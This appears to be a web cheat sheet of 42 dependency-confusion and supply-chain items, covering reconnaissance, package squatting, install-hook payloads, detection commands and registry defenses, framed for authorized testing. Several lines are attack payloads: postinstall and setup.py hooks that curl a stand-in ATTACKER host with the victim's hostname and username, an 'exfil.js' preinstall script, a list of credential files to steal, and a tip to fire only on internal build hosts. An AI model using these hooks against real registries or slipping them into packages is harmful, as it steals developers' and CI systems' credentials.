$loading...
Dependency confusion and software supply chain attacks — internal package squatting, scoped package abuse, install-script RCE, detection across npm/PyPI/Maven, and registry-level defenses. (42 payloads)
grep -rhoE '"@?[a-z0-9._-]+/?[a-z0-9._-]+":' package.json */package.json | sort -ucurl -s https://registry.npmjs.org/<pkgname> -o /dev/null -w '%{http_code}'for p in $(cat names.txt); do curl -s -o /dev/null -w "%{http_code} $p\n" https://pypi.org/pypi/$p/json; donesite:github.com "registry=https://npm." OR ".npmrc" <company>Inspect webpack/Vite bundles & sourcemaps for require()/import of names that 404 on npmcurl -s https://<company>.jfrog.io/artifactory/api/repositories | jq '.[].key'Search Docker image layers (dive / docker history) for COPY of package.json, requirements.txt, pom.xmlnpm publish --registry https://registry.npmjs.org{ "version": "99.9.9" }npm install @company/internal-lib # scope @company unclaimed on public npmnpm org create company # claim the scope before an attacker doesname: typo of popular pkg (e.g. crossenv, electorn, loadyaml, jquery-mobil)@scope/lib with extra hyphen/underscore (cross-env vs cross_env)Republish a deleted/unpublished name (npm unpublish leaves a 24h+ window)"scripts": { "preinstall": "node exfil.js" }"postinstall": "curl -s https://ATTACKER/$(hostname)/$(whoami) >/dev/null"from setuptools import setup\n# arbitrary code runs at `pip install` parse time\nimport os; os.system('curl https://ATTACKER')RubyGems: extconf.rb / Gem post_install_message + native ext build runs codeCargo build.rs runs at compile time on `cargo build`Exfil targets: ~/.npmrc, ~/.aws/credentials, env vars, /proc/self/environ, CI secretsStage 2: only fire payload if internal hostname/CI env vars presentpip install -i https://internal --extra-index-url https://pypi.org pkgMaven: missing <repositories> ordering lets Central resolve a groupId you assumed was internalGradle: mavenCentral() listed before/alongside internal repo → version-driven resolutionNuGet: nuget.config without packageSourceMapping resolves from any feed by versionGo: GONOSUMCHECK / replaced module path + public proxy can serve a confused moduleGitHub Actions: uses: org/action@v1 where org/action repo is unclaimednpm ls --all 2>/dev/null | grep -iE 'company|internal|corp'jq -r '.packages | to_entries[] | "\(.key)\t\(.value.resolved)"' package-lock.jsonnpm audit signatures # verifies registry signatures on installed packagesosv-scanner -r . # OSV / OpenSSF scanner across lockfilesconfused -l npm -f package.json # visma confused / dependency-confusion scannersyft dir:. -o spdx-json > sbom.json (then diff against known-good)Alert on outbound DNS/HTTP from build agents during install (network egress monitoring)Reserve all internal @scopes and package names on the public registry.npmrc: @company:registry=https://internal && always-auth=truepip: use a single index that proxies & caches public, never --extra-index-urlNuGet: <packageSourceMapping> patterns pinning prefixes to specific feedsnpm ci --ignore-scripts (and enableScripts:false in .yarnrc.yml)Commit lockfiles + enable npm ci / pip install --require-hashesProxy registry with upstream-block on internal namespaces (Artifactory exclude patterns)Sign & verify: Sigstore/cosign, npm provenance (--provenance), SLSA build attestationsLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 42 Dependency Confusion payloads for testing Dependency Confusion & Supply Chain vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or use the Secret Scanner to apply them interactively. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all Dependency Confusion payloads are completely free, with no account required. Everything runs in your browser.